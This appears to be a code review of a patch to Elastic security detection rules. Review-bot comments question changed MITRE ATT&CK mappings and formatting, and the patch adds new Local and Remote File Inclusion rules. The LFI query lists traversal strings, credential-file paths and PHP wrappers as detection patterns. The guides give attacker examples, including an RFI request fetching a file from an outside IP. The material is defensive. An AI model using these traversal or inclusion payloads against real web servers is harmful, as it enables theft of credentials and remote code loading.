 reference = "https://attack.mitre.org/techniques/T1070/"
-[[rule.threat.technique.subtechnique]]
-id = "T1070.004"
-name = "File Deletion"
-reference = "https://attack.mitre.org/techniques/T1070/004/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml
index 633392510ce..a33eb01577e 100644
--- a/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml
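Review bot: Dropping the `T1070.004` File Deletion subtechnique leaves a rule keyed on `event.type == "deletion"` of web server access logs mapped only to the parent `T1070` Indicator Removal, which is the less specific of the two; unless this series is deliberately normalizing every rule to technique level, I would keep the `[[rule.threat.technique.subtechnique]]` block. The new side also drops the blank line between `framework = "MITRE ATT&CK"` and `[[rule.threat.technique]]` and appends an empty line at end of file, which does not match the single-blank-line spacing the rest of the file uses.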
+++ b/rules/cross-platform/defense_evasion_encoding_rot13_python_script.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/09/17"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 [rule]
 author = ["Elastic"]
@@ -81,23 +81,22 @@ ROT encoding, a simple letter substitution cipher, is often used to obfuscate Py
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1027.013"
 name = "Encrypted/Encoded File"
 reference = "https://attack.mitre.org/techniques/T1027/013/"
-[[rule.threat.technique]]
-id = "T1140"
-name = "Deobfuscate/Decode Files or Information"
-reference = "https://attack.mitre.org/techniques/T1140/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/cross-platform/defense_evasion_genai_config_modification.toml b/rules/cross-platform/defense_evasion_genai_config_modification.toml
index a7df32f5e59..812702a98d9 100644
--- a/rules/cross-platform/defense_evasion_genai_config_modification.toml
+++ b/rules/cross-platform/defense_evasion_genai_config_modification.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/04"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/10"
 [rule]
 author = ["Elastic"]
@@ -56,7 +56,17 @@ references = [
 risk_score = 47
 rule_id = "590fc62d-7386-4c75-92b0-af4517018da1"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide", "Domain: LLM"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Persistence",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+ "Domain: LLM",
+]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -94,21 +104,29 @@ file.path : (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1546"
-name = "Event Triggered Execution"
-reference = "https://attack.mitre.org/techniques/T1546/"
+id = "T1556"
+name = "Modify Authentication Process"
+reference = "https://attack.mitre.org/techniques/T1556/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
-id = "T1574"
-name = "Hijack Execution Flow"
-reference = "https://attack.mitre.org/techniques/T1574/"
+id = "T1554"
+name = "Compromise Host Software Binary"
+reference = "https://attack.mitre.org/techniques/T1554/"
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable"]
diff --git a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
index 7a5756a489d..20e0c1c6df0 100644
--- a/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
+++ b/rules/cross-platform/defense_evasion_genai_process_compiling_executables.toml
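Review bot: The Defense Evasion entry now maps to `T1556` Modify Authentication Process and the Persistence entry to `T1554` Compromise Host Software Binary, yet this rule appears to watch modifications to GenAI tool configuration files (its name and the `file.path : (` hunk context), which are neither authentication mechanisms nor host binaries. If those configs govern tool permissions or guardrails, `T1562` Impair Defenses is a closer Defense Evasion fit; otherwise the removed `T1546`/`T1574` pair under Persistence reads as the more defensible mapping. The tags and tactics are at least consistent with each other here, so only the technique choice needs a sentence of justification in the PR.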
@@ -2,7 +2,7 @@
 creation_date = "2025/12/04"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "auditd_manager"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/04"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,23 @@ references = [
 risk_score = 47
 rule_id = "b2c3d4e5-f6a7-8901-bcde-f123456789ab"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Resource Development", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Auditd Manager", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0053"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Execution",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Auditd Manager",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+ "Domain: LLM",
+ "Mitre Atlas: T0053",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -124,18 +140,19 @@ process where event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1587"
-name = "Develop Capabilities"
-reference = "https://attack.mitre.org/techniques/T1587/"
-
+id = "T1027"
+name = "Obfuscated Files or Information"
+reference = "https://attack.mitre.org/techniques/T1027/"
 [[rule.threat.technique.subtechnique]]
-id = "T1587.001"
-name = "Malware"
-reference = "https://attack.mitre.org/techniques/T1587/001/"
+id = "T1027.004"
+name = "Compile After Delivery"
+reference = "https://attack.mitre.org/techniques/T1027/004/"
+
+
 [rule.threat.tactic]
-id = "TA0042"
-name = "Resource Development"
-reference = "https://attack.mitre.org/tactics/TA0042/"
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
index ec1658731b2..1f8053d9767 100644
--- a/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
+++ b/rules/cross-platform/defense_evasion_genai_process_encoding_prior_to_network_activity.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/04"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/04"
 [rule]
 author = ["Elastic"]
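Review bot: The tags hunk for this file (L1820) adds `"Tactic: Execution"`, but the only `[rule.threat.tactic]` on the new side here is `TA0005` Defense Evasion, so that tag has no backing `[[rule.threat]]` entry unless one exists beyond the hunk. Either drop the tag or add an Execution entry (technique-level `T1059` Command and Scripting Interpreter, as the whitespace-padding rule at L1825 does) so tags and threat mappings agree. The two added empty lines before `[rule.threat.tactic]` and the one appended at end of file are also out of step with the single blank line between tables elsewhere in the file.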
@@ -60,7 +60,22 @@ references = [
 risk_score = 47
 rule_id = "c3d4e5f6-a7b8-9012-cdef-123456789abc"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Defense Evasion", "Tactic: Exfiltration", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Domain: LLM", "Mitre Atlas: T0086"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "OS: macOS",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Exfiltration",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+ "Domain: LLM",
+ "Mitre Atlas: T0086",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -144,39 +159,14 @@ sequence by process.entity_id with maxspan=30s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1560"
-name = "Archive Collected Data"
-reference = "https://attack.mitre.org/techniques/T1560/"
-
-[rule.threat.tactic]
-id = "TA0009"
-name = "Collection"
-reference = "https://attack.mitre.org/tactics/TA0009/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1020"
-name = "Automated Exfiltration"
-reference = "https://attack.mitre.org/techniques/T1020/"
-
-[rule.threat.tactic]
-id = "TA0010"
-name = "Exfiltration"
-reference = "https://attack.mitre.org/tactics/TA0010/"
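Review bot: `"Tactic: Exfiltration"` survives in the tags hunk above while the `[[rule.threat]]` entry for `TA0010` Exfiltration (`T1020` Automated Exfiltration) is removed in this hunk, so the tag is now orphaned; by contrast the Collection tag and the `TA0009` entry were removed together, which is the consistent pattern. For a rule whose file name says "encoding prior to network activity", keeping the Exfiltration entry looks more defensible than dropping the tag, but one of the two has to happen for tags and threat mappings to agree.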
diff --git a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml
index a7a04ddf251..4b53205e011 100644
--- a/rules/cross-platform/defense_evasion_missing_events_after_alert.toml
+++ b/rules/cross-platform/defense_evasion_missing_events_after_alert.toml
@@ -2,7 +2,7 @@
 creation_date = "2026/02/10"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/09"
 [rule]
 author = ["Elastic"]
@@ -58,7 +58,15 @@ references = ["https://attack.mitre.org/techniques/T1562/001/"]
 risk_score = 73
 rule_id = "fc552f49-8f1c-409b-90f8-6f5b9869b6c4"
 severity = "high"
-tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Use Case: Threat Detection", "Rule Type: Higher-Order Rule", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "Data Source: Elastic Defend",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Rule Type: Higher-Order Rule",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -70,18 +78,38 @@ sequence by host.id with maxspan=5m
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1562"
 name = "Impair Defenses"
 reference = "https://attack.mitre.org/techniques/T1562/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1562.001"
 name = "Disable or Modify Tools"
 reference = "https://attack.mitre.org/techniques/T1562/001/"
+
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml
index 74cb039c6db..31b65ceebca 100644
--- a/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml
+++ b/rules/cross-platform/defense_evasion_whitespace_padding_command_line.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/06/30"
 integration = ["endpoint", "system", "windows", "auditd_manager", "m365_defender", "crowdstrike", "sentinel_one_cloud_funnel"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/12/09"
 [rule]
 author = ["Elastic"]
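Review bot: The new Execution entry pins `T1204.002` Malicious File onto a higher-order rule that correlates an alert with a subsequent gap in endpoint telemetry (`sequence by host.id with maxspan=5m`); nothing in that correlation observes a user opening a file, so the mapping appears inferred from whatever alert triggered the sequence rather than from what this rule detects. If an Execution tactic is wanted at all, technique-level `T1204` is the safer choice; otherwise drop both this entry and the `"Tactic: Execution"` tag added at L1823. The hunk also inserts two empty lines before the first `[rule.threat.tactic]`, two before the second `[[rule.threat]]`, three before the second tactic and one at end of file; the hunks at L1815, L1821 and L1825 carry the same irregular spacing, where one blank line between tables matches the rest of these files.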
@@ -71,7 +71,16 @@ mean time to respond (MTTR).
 risk_score = 47
 rule_id = "5a876e0d-d39a-49b9-8ad8-19c9b622203b"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "OS: macOS",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Defense Evasion",
+ "Tactic: Execution",
+ "Resources: Investigation Guide"
+]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -87,18 +96,35 @@ FROM logs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
-[[rule.threat.technique.subtechnique]]
-id = "T1027.010"
-name = "Command Obfuscation"
-reference = "https://attack.mitre.org/techniques/T1027/010/"
+[[rule.threat.technique]]
+id = "T1140"
+name = "Deobfuscate/Decode Files or Information"
+reference = "https://attack.mitre.org/techniques/T1140/"
+
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1059"
+name = "Command and Scripting Interpreter"
+reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.001"
+name = "PowerShell"
+reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml
index 4d1929a052b..c6e250f6b81 100644
--- a/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml
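Review bot: Replacing `T1027.010` Command Obfuscation with `T1140` Deobfuscate/Decode Files or Information moves the Defense Evasion mapping away from the subtechnique that most directly describes command-line whitespace padding, and the new Execution entry pins `T1059.001` PowerShell on a rule tagged `OS: Linux` and `OS: macOS` with `auditd_manager` among its integrations. Unless the ES|QL query (outside the hunk, starting `FROM logs-* metadata _id, _version, _index`) is PowerShell-specific, technique-level `T1059` is the honest Execution mapping and `T1027.010` is worth keeping alongside or instead of `T1140`. The three empty lines before the second `[rule.threat.tactic]` should be collapsed to one, and the tags list here lacks the trailing comma after `"Resources: Investigation Guide"` that the other reformatted tag lists in this patch use.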
+++ b/rules/cross-platform/discovery_virtual_machine_fingerprinting_grep.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/09/29"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/01/15"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,15 @@ Hence for this rule to work effectively, users will need to add a custom ingest
 For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html
 """
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: macOS", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: macOS",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -81,36 +89,14 @@ Virtual machine fingerprinting involves identifying virtualized environments by
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1497"
-name = "Virtualization/Sandbox Evasion"
-reference = "https://attack.mitre.org/techniques/T1497/"
+id = "T1082"
+name = "System Information Discovery"
+reference = "https://attack.mitre.org/techniques/T1082/"
-[[rule.threat.technique.subtechnique]]
-id = "T1497.001"
-name = "System Checks"
-reference = "https://attack.mitre.org/techniques/T1497/001/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1497"
-name = "Virtualization/Sandbox Evasion"
-reference = "https://attack.mitre.org/techniques/T1497/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1497.001"
-name = "System Checks"
-reference = "https://attack.mitre.org/techniques/T1497/001/"
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
diff --git a/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml
new file mode 100644
index 00000000000..2f85b8138b9
--- /dev/null
+++ b/rules/cross-platform/discovery_web_server_local_file_inclusion_activity.toml
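Review bot: The rewrite drops `T1497.001` System Checks entirely in favor of `T1082` System Information Discovery, although grep-based virtual machine fingerprinting is the canonical example of Virtualization/Sandbox Evasion: System Checks. ATT&CK lists `T1497` under both Defense Evasion and Discovery, so the old file's two entries were legitimate dual-tactic mappings rather than duplicates; if the goal is to remove the Defense Evasion tactic only, keep the `T1497`/`T1497.001` blocks under `TA0007` Discovery and drop `T1082`, or carry both techniques. The tags hunk at L1826 removes `"Tactic: Defense Evasion"` consistently, so only the technique choice is at issue.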
@@ -0,0 +1,174 @@
+[metadata]
+creation_date = "2025/12/02"
+integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
+maturity = "production"
+min_stack_version = "9.2.0"
+min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0"
+updated_date = "2026/03/19"
+
+[rule]
+author = ["Elastic"]
+description = """
+This rule detects potential Local File Inclusion (LFI) activity on web servers by identifying HTTP GET requests that
+attempt to access sensitive local files through directory traversal techniques or known file paths. Attackers may
+exploit LFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
+"""
+from = "now-11m"
+interval = "10m"
+language = "esql"
+license = "Elastic License v2"
+name = "Web Server Local File Inclusion Activity"
+note = """ ## Triage and analysis
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+### Investigating Web Server Local File Inclusion Activity
+
+This rule surfaces successful GET requests containing directory traversal or direct access to sensitive paths, signaling Local File Inclusion exploitation that can expose credentials, configuration, and process context and enable further compromise. A common attacker pattern is abusing a vulnerable parameter to fetch ../../../../etc/passwd, then pivoting to /proc/self/environ to harvest secrets and identify execution context for subsequent steps.
+
+### Possible investigation steps
+
+- Retrieve contiguous access logs around the alert to rebuild each request/response pair (URI, parameters, user agent, referer, cookies, X-Forwarded-For) and identify which parameter reflected traversal or wrapper usage and whether the response likely contained file contents.
+- Compare response sizes and content-types for the suspicious requests to normal pages and look for signatures such as "root:x:" lines, INI/XML keys, or base64 blobs that indicate disclosure of /etc/passwd, web.config/applicationhost.config, or other sensitive files.
+- Review web server and application error logs at the same timestamps for include/open stream warnings, open_basedir or allow_url_fopen messages, and stack traces to confirm the code path handling the input and any mitigations in place.
+- Pivot on the same source and timeframe to find adjacent probes (php://filter, data://, expect://, zip://, phar://, /proc/self/environ, traversal into webroots/configs) and any follow-on POSTs to upload endpoints or new script paths, signaling progression toward RCE or webshell placement.
+- Determine whether the traffic was authenticated and whether it traversed a WAF or reverse proxy by correlating cookies or session IDs and client IPs with proxy/WAF logs, noting any blocks, rule matches, or bypasses to bound scope and urgency.
+
+### False positive analysis
+
+- A site search or documentation endpoint echoing user-supplied text can include strings like ../../../../etc/passwd, windows/win.ini, or php://filter in the query string and return a normal 200 OK results page rather than performing a file include.
+- An authenticated admin feature (such as a log viewer or file browser) may legitimately accept path= or file= parameters referencing local paths like /var/log/nginx or /inetpub/logs/logfiles and return 200 when serving allowed files, producing URLs that match the rule without exploitation.
+
+### Response and remediation
+
+- Immediately block the source IP at the reverse proxy/WAF and deploy deny rules for GET requests using ../../ or ..\\..\\ traversal or wrappers (php://, expect://, data://) that fetch /etc/passwd, /proc/self/environ, wp-config.php, web.config, or applicationhost.config.
+- Configure the web server to return 403 for paths resolving to /proc, /etc, /var/log, /inetpub, applicationhost.config, and web.config and to reject wrapper schemes like php:// and expect://, then reload Nginx/Apache/IIS to apply.
+- Fix the vulnerable include logic by canonicalizing input with realpath, rejecting any .. segments or absolute paths, enforcing a whitelist of allowed files, and in PHP disabling allow_url_include/allow_url_fopen and setting open_basedir to a safe directory.
+- Rotate exposed secrets by changing database and API credentials from wp-config.php, connection strings and machine keys from web.config/applicationhost.config, and any tokens in /proc/self/environ, then invalidate active sessions and cache.
+- Escalate to incident leadership and quarantine the host if response bodies contain credential patterns (e.g., "root:x:" from /etc/passwd or XML keys from web.config), if /etc/shadow or windows/system32/config/SAM was requested, or if follow-on POSTs or new .php/.aspx files appear in the webroot.
+- Recover by verifying integrity of /var/www and /inetpub/wwwroot, scanning for webshells and unexpected includes, redeploying a known-good build or container image if tampering is found, and adding WAF normalization to double-decode URLs and 403 traversal attempts.
+""" +risk_score = 21 +rule_id = "90e4ceab-79a5-4f8e-879b-513cac7fcad9" +severity = "low" +tags = [ + "Domain: Web", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Nginx", + "Data Source: Apache", + "Data Source: Apache Tomcat", + "Data Source: IIS", + "Data Source: Traefik", + "Resources: Investigation Guide", +] +timestamp_override = "event.ingested" +type = "esql" +query = ''' +from + logs-nginx.access-*, + logs-apache.access-*, + logs-apache_tomcat.access-*, + logs-iis.access-*, + logs-traefik.access-* +| where + http.request.method == "GET" and + http.response.status_code == 200 and + url.original like "*=*" + +| eval Esql.url_original_url_decoded_to_lower = to_lower(URL_DECODE(url.original)) + +| where + /* 1) Relative traversal */ + Esql.url_original_url_decoded_to_lower like "*../../../../*" or // Unix-style traversal + Esql.url_original_url_decoded_to_lower like "*..\\\\..\\\\..\\\\..*" or // Windows-style traversal + // Potential security check bypassing (enforcing multiple dots and shortening the pattern) + Esql.url_original_url_decoded_to_lower like "*..././*" or + Esql.url_original_url_decoded_to_lower like "*...\\*" or + Esql.url_original_url_decoded_to_lower like "*....\\*" or + + /* 2) Linux system identity / basic info */ + Esql.url_original_url_decoded_to_lower like "*etc/passwd*" or + Esql.url_original_url_decoded_to_lower like "*etc/shadow*" or + Esql.url_original_url_decoded_to_lower like "*etc/hosts*" or + Esql.url_original_url_decoded_to_lower like "*etc/os-release*" or + Esql.url_original_url_decoded_to_lower like "*etc/issue*" or + + /* 3) Linux /proc enumeration */ + Esql.url_original_url_decoded_to_lower like "*proc/self/environ*" or + Esql.url_original_url_decoded_to_lower like "*proc/self/cmdline*" or + Esql.url_original_url_decoded_to_lower like "*proc/self/fd*" or + Esql.url_original_url_decoded_to_lower like "*proc/self/exe*" or + + /* 4) Linux webroots, configs & logs */ + 
Esql.url_original_url_decoded_to_lower like "*var/www*" or // generic webroot + Esql.url_original_url_decoded_to_lower like "*wp-config.php*" or // classic WP config + Esql.url_original_url_decoded_to_lower like "*etc/apache2*" or + Esql.url_original_url_decoded_to_lower like "*etc/httpd*" or + Esql.url_original_url_decoded_to_lower like "*etc/nginx*" or + Esql.url_original_url_decoded_to_lower like "*var/log/apache2*" or + Esql.url_original_url_decoded_to_lower like "*var/log/httpd*" or + Esql.url_original_url_decoded_to_lower like "*var/log/nginx*" or + + /* 5) Windows core files / identity */ + Esql.url_original_url_decoded_to_lower like "*windows/panther/*unattend*" or + Esql.url_original_url_decoded_to_lower like "*windows/debug/netsetup.log*" or + Esql.url_original_url_decoded_to_lower like "*windows/win.ini*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/drivers/etc/hosts*" or + Esql.url_original_url_decoded_to_lower like "*boot.ini*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/config/*" or + Esql.url_original_url_decoded_to_lower like "*windows/repair/sam*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/license.rtf*" or + + /* 6) Windows IIS / .NET configs, webroots & logs */ + Esql.url_original_url_decoded_to_lower like "*/inetpub/wwwroot*" or + Esql.url_original_url_decoded_to_lower like "*/inetpub/logs/logfiles*" or + Esql.url_original_url_decoded_to_lower like "*applicationhost.config*" or + Esql.url_original_url_decoded_to_lower like "*/microsoft.net/framework64/*/config/web.config*" or + Esql.url_original_url_decoded_to_lower like "*windows/system32/inetsrv/*" or + + /* 7) PHP & protocol wrappers */ + Esql.url_original_url_decoded_to_lower like "*php://*" or + Esql.url_original_url_decoded_to_lower like "*zip://*" or + Esql.url_original_url_decoded_to_lower like "*phar://*" or + Esql.url_original_url_decoded_to_lower like "*expect://*" or + Esql.url_original_url_decoded_to_lower like 
"*file://*" or + Esql.url_original_url_decoded_to_lower like "*data://text/plain;base64*" + +| keep + @timestamp, + Esql.url_original_url_decoded_to_lower, + source.ip, + agent.id, + agent.name, + http.request.method, + http.response.status_code, + event.dataset, + data_stream.namespace + +| stats + Esql.event_count = count(), + Esql.url_original_url_decoded_to_lower_count_distinct = count_distinct(Esql.url_original_url_decoded_to_lower), + Esql.agent_name_values = values(agent.name), + Esql.agent_id_values = values(agent.id), + Esql.http_request_method_values = values(http.request.method), + Esql.http_response_status_code_values = values(http.response.status_code), + Esql.url_original_url_decoded_to_lower_values = values(Esql.url_original_url_decoded_to_lower), + Esql.event_dataset_values = values(event.dataset), + Esql.data_stream_namespace_values = values(data_stream.namespace) + by source.ip +''' + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1083" +name = "File and Directory Discovery" +reference = "https://attack.mitre.org/techniques/T1083/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml new file mode 100644 index 00000000000..8ea0b32ead0 --- /dev/null +++ b/rules/cross-platform/discovery_web_server_remote_file_inclusion_activity.toml 
@@ -0,0 +1,135 @@
+[metadata]
+creation_date = "2025/12/02"
+integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"]
+maturity = "production"
+min_stack_version = "9.2.0"
+min_stack_comments = "The esql url_decode() operator was introduced in version 9.2.0"
+updated_date = "2026/03/19"
+
+[rule]
+author = ["Elastic"]
+description = """
+This rule detects potential Remote File Inclusion (RFI) activity on web servers by identifying HTTP GET requests that
+attempt to access sensitive remote files through directory traversal techniques or known file paths. Attackers may
+exploit RFI vulnerabilities to read sensitive files, gain system information, or further compromise the server.
+"""
+from = "now-11m"
+interval = "10m"
+language = "esql"
+license = "Elastic License v2"
+name = "Web Server Potential Remote File Inclusion Activity"
+note = """## Triage and analysis
+
+> **Disclaimer**:
+> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.
+
+### Investigating Web Server Potential Remote File Inclusion Activity
+
+This rule identifies successful GET requests that pass a remote URL or raw IP in a parameter, signaling Remote File Inclusion attempts that coerce the app to fetch external content or reveal local files. RFI matters because it enables discovery, leaks sensitive data, and can bootstrap code retrieval for persistence or command-and-control. Example behavior: probing an include endpoint with /index.php?page=http://203.0.113.10/drop.txt to verify remote fetch and execution via a vulnerable loader.
+
+### Possible investigation steps
+
+- Decode the full request URL and parameters, identify the endpoint and parameter names, and confirm with application owners whether passing remote URLs is expected behavior for that route.
+- Correlate the event time with outbound connections from the web server to the referenced domain or IP using egress firewall, proxy, DNS, or NetFlow logs to verify whether a fetch occurred.
